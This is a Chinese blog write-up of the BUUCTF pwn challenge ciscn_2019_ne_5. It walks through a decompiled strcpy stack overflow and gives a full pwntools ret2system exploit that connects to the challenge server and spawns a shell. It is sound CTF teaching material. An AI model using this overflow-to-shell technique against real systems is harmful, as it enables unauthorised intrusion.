• ciscn_2019_ne_5【BUUCTF】

    在这里插入图片描述
    保护只开了一个栈不可执行,动态编译,32位,查看IDA

    // main函数主要是一个目录,没有啥溢出点
 puts("Welcome!");
 puts("Input your operation:");
 puts("1.Add a log.");
 puts("2.Display all logs.");
 puts("3.Print all logs.");
 // 注意还有个选项4,这里没显示
 printf("0.Exit\n:");
 __isoc99_scanf("%d", &v4);
 switch ( v4 )
  {
    case 0:
      exit(0);
      return result;
    case 1:
      AddLog((int)src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 2:
      Display(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 3:
      Print();
      result = sub_804892B(argc, argv, envp);
      break;
    case 4:
      GetFlag(src);
      result = sub_804892B(argc, argv, envp);
      break;
    default:
      result = sub_804892B(argc, argv, envp);
      break;
  }
 // AddLog就是输入一段字符串,没啥有价值
 int __cdecl AddLog(int a	1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s", a1);
}
// Display 打印一段输入内容
int __cdecl Display(char *s)
{
  return puts(s);
}
// 这个函数没啥用,就是表明存在system函数 
int Print()
{
  return system("echo Printing......");
}
// GetFlag,该函数中存在溢出漏洞,在strcpy函数中,src可以无限大的,但dest是有限的
int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h] BYREF
  char v3[60]; // [esp+4h] [ebp-44h] BYREF
  *(_DWORD *)dest = 48;
  memset(v3, 0, sizeof(v3));
  strcpy(dest, src);
  return printf("The flag is your log:%s\n", dest);
}

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60

    漏洞分析

    在GetFlag中, strcpy(dest, src)函数存在栈溢出漏洞,因此我们要构建溢出src字符串,AddLog可以对src进行修改,因此我们先执行AddLog函数修改src,再执行GetFlag函数,执行漏洞,获取权限
    步骤分析:

    • 输入密码administrator,绕过main函数的审查
    • 输入1执行AddLog函数修改src
    • 输入4,进行漏洞溢出,获取权限

    完整代码

    # encoding=utf-8
from pwn import *
from LibcSearcher import *
context.log_level = True
context(os='linux', arch='amd64')
# io = process("./ciscn_2019_ne_5")
io = remote("node4.buuoj.cn",26667)
elf = ELF("./ciscn_2019_ne_5")
system_addr = elf.symbols["system"]
main_addr = elf.symbols["main"]
sh_addr = 0x080482ea
io.sendlineafter("Please input admin password:",'administrator')
io.sendline("1")
payload = b'a'*(0x48+4) + p32(system_addr) + p32(main_addr) + p32(sh_addr)
io.sendlineafter("info:",payload)
io.sendline("4")
io.interactive()

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
  • 相关阅读:
    CSS基础入门01
    Thrift 序列化协议浅析
    第 2 章 微信小程序的构成 (代码导读)断更,后续继续更新
    一篇文章搞懂MySQL的分库分表,从拆分场景、目标评估、拆分方案、不停机迁移、一致性补偿等方面详细阐述MySQL数据库的分库分表方案
    第十一届蓝桥杯省赛第一场C++ B组《整除序列》(c++)
    十年架构师养成记!MySQL+Redis+ZK+Nginx实战技术,大厂向你招手
    python---三目运算符
    如何启动一个Vue项目
    UE5实现PS图层样式投影效果
    【Spring学习笔记】
  • 原文地址:https://blog.csdn.net/qq_41696518/article/details/126623439